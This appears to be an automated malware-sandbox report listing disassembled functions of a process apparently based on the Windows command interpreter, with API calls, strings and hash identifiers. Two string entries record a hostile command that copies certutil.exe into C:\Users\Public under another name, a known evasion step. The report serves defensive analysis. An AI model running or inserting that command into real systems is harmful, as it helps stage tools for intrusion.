                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CreateFile_open_osfhandle
                                                      • String ID: con
                                                      • API String ID: 2905481843-4257191772
                                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                      • Instruction ID: 28c94b767a3f3a8ab91745c11f618c4a820b8c3368c99349bcebe8ad41540cb1
                                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                      • Instruction Fuzzy Hash: BB71F572A086818AE720EF14E441379FAA0FB89B61F908636DE5E437D4DFBCD449CB51
                                                      Function 00007FF7E1DD93E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                      • String ID:
                                                      • API String ID: 3829876242-3916222277
                                                      • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                      • Instruction ID: 2c44bd73d188369a74776ba70537fb40c35159c8dce1fb845f5eb0028e06d019
                                                      • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                      • Instruction Fuzzy Hash: 63619026A0864296EB18EB11D40237AB7A1FF89B55F848236DE0E03794DFBDE405CB51
                                                      Function 00007FF7E1DE1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                      • String ID: CSVFS$NTFS$REFS
                                                      • API String ID: 3510147486-2605508654
                                                      • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                      • Instruction ID: d5109ec977ddfb670ce27ede2dd98124cdc1ebd0c64a30f435b3edf5cd48074b
                                                      • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                      • Instruction Fuzzy Hash: 12617032B04BC28AEB65DF21D8453E9B7A4FB45B85F848136DA0E8B758DFB8D104C711
                                                      Function 00007FF7E1DB72B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF7E1DB7279,?,?,?,?,?,00007FF7E1DBBFA9), ref: 00007FF7E1DD4485
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: longjmp
                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                      • API String ID: 1832741078-366822981
                                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                      • Instruction ID: f2986dfb5bad7aab7f88fde25f359ef9a1f6a9f63bd8ddbb89306ee490ca39ef
                                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                      • Instruction Fuzzy Hash: CBC19060F0C64292EB29FB165583BB8A391AB46B94FD14137DD0E93B91CFBCE4458363
                                                      Function 00007FF7E1DBB998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • memset.MSVCRT ref: 00007FF7E1DBBA2B
                                                      • wcschr.MSVCRT ref: 00007FF7E1DBBA8A
                                                      • wcschr.MSVCRT ref: 00007FF7E1DBBAAA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heapwcschr$AllocProcessmemset
                                                      • String ID: -$:.\$=,;$=,;+/[] "
                                                      • API String ID: 2872855111-969133440
                                                      • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                      • Instruction ID: aa631f811c27f997e82a5448d44456c70c6c72255aca884d1ccd4520888a0ccb
                                                      • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                      • Instruction Fuzzy Hash: CFB19021A0CA4291EB70EB15A48677EA6A0FF48B80FC54237CA5F43794DFBCE441C362
                                                      Function 00007FF7E1DBFC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                      • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                      • API String ID: 1606811317-2340392073
                                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                      • Instruction ID: 56dea98b3dd7c6bdad57e94b43cbcc176b0d99688921cfd50420ee9cf5b225a1
                                                      • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                      • Instruction Fuzzy Hash: D1D1C125E08A4691E710EB15A8027B9F7A0FF45B90FC44233DA5E437A8DFBCE515C762
                                                      Function 00007FF7E1DE03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$ErrorLast$InformationVolume
                                                      • String ID: %04X-%04X$~
                                                      • API String ID: 2748242238-2468825380
                                                      • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                      • Instruction ID: 9149d1103da0d13986234c1db232cb06b2649f0f38415d4def51de95417bca1a
                                                      • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                      • Instruction Fuzzy Hash: E4A1B222B08BC58AEB25EF2098413EDB7A1FB85785F908136DA4D4BB88DF7CD205C711
                                                      Function 00007FF7E1DC662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC6677
                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC668F
                                                      • _errno.MSVCRT ref: 00007FF7E1DC66A3
                                                      • wcstol.MSVCRT ref: 00007FF7E1DC66C4
                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC66E4
                                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC66FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                                      • API String ID: 2348642995-441775793
                                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                      • Instruction ID: ca8143f6e47332e88ab069ff67c314f5b3a21bba278fb472dbcc5122a00a3721
                                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                      • Instruction Fuzzy Hash: FF719172D0864685EB60AF11D412379F7A0EB45B45F94C833DA5E82794EFBCE484C7A2
                                                      Function 00007FF7E1DB9400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                      • String ID: FAT$~
                                                      • API String ID: 2238823677-1832570214
                                                      • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                      • Instruction ID: f8d81f298efa54a0f6df4630331f2190fc4e62be85a8a291506fb250954b2e0b
                                                      • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                      • Instruction Fuzzy Hash: FE71C072A08BC199EB25EF20D8417EAB7A0FB45785F808436DA4E4BB58DF7CD245C711
                                                      Function 00007FF7E1DBD840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBD884
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBD89D
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBD94D
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBD964
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DBDB89
                                                      • wcstol.MSVCRT ref: 00007FF7E1DBDBDF
                                                      • wcstol.MSVCRT ref: 00007FF7E1DBDC63
                                                      • memmove.MSVCRT ref: 00007FF7E1DBDD33
                                                      • memmove.MSVCRT ref: 00007FF7E1DBDE9A
                                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7E1DBFE2A), ref: 00007FF7E1DBDF1F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                      • String ID:
                                                      • API String ID: 1051989028-0
                                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                      • Instruction ID: b76d20905de31954197f75d522122410a9510c64791772ac05eb4744c54fba0c
                                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                      • Instruction Fuzzy Hash: 8502A376A0CB4191EB24EF15E4417BAF6A1FB48B98F944132DA8E03794DFBCE451C721
                                                      Function 00007FF7E1DB86B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                      • API String ID: 3223794493-3086019870
                                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                      • Instruction ID: ca804720800a187d85eb06eb867aab45701d57453f7ed891932efa93b519e904
                                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                      • Instruction Fuzzy Hash: 0151C565E08B4296EB05EB15E402379BBA0FF49B91F948537C91E433A4DFBCE050C762
                                                      Function 00007FF7E1DC2B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                      • API String ID: 0-3124875276
                                                      • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                      • Instruction ID: acac2107cf762a0ee8e574434bffe90ef86d7d7f8d5621a0e2d88007cd44ba83
                                                      • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                      • Instruction Fuzzy Hash: 7E515D60E0C64381FB14FF24E4163B9A7A4AF95B46FC08437D64E862A4DFBCA445C7A2
                                                      Function 00007FF7E1DDBFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7E1DDC6DB), ref: 00007FF7E1DC58EF
                                                        • Part of subcall function 00007FF7E1DC081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC084E
                                                      • towupper.MSVCRT ref: 00007FF7E1DDC1C9
                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DDC31C
                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7E1DDC5CB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                      • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                      • API String ID: 2242554020-619615743
                                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                      • Instruction ID: 524f4a24d3745c98c4f9fcbeebf589cec0c5e1ad0c88d3084e5385e8a2d980d0
                                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                      • Instruction Fuzzy Hash: E4128421A0865281EB24FB15A44637AE7A0EF44BA4FD4433BE99D437E4DFBCE541C722
                                                      Function 00007FF7E1DC6FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 00007FF7E1DC7013
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DC7123
                                                        • Part of subcall function 00007FF7E1DC1EA0: wcschr.MSVCRT(?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7E1DE0D54), ref: 00007FF7E1DC1EB3
                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC706E
                                                      • wcsncmp.MSVCRT ref: 00007FF7E1DC70A5
                                                      • wcsstr.MSVCRT ref: 00007FF7E1DCF9DB
                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DCFA00
                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DCFA5F
                                                        • Part of subcall function 00007FF7E1DC823C: FindFirstFileExW.KERNELBASE ref: 00007FF7E1DC8280
                                                        • Part of subcall function 00007FF7E1DC823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DC829D
                                                        • Part of subcall function 00007FF7E1DC3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DDEAC5,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DC3A56
                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DCFA3D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
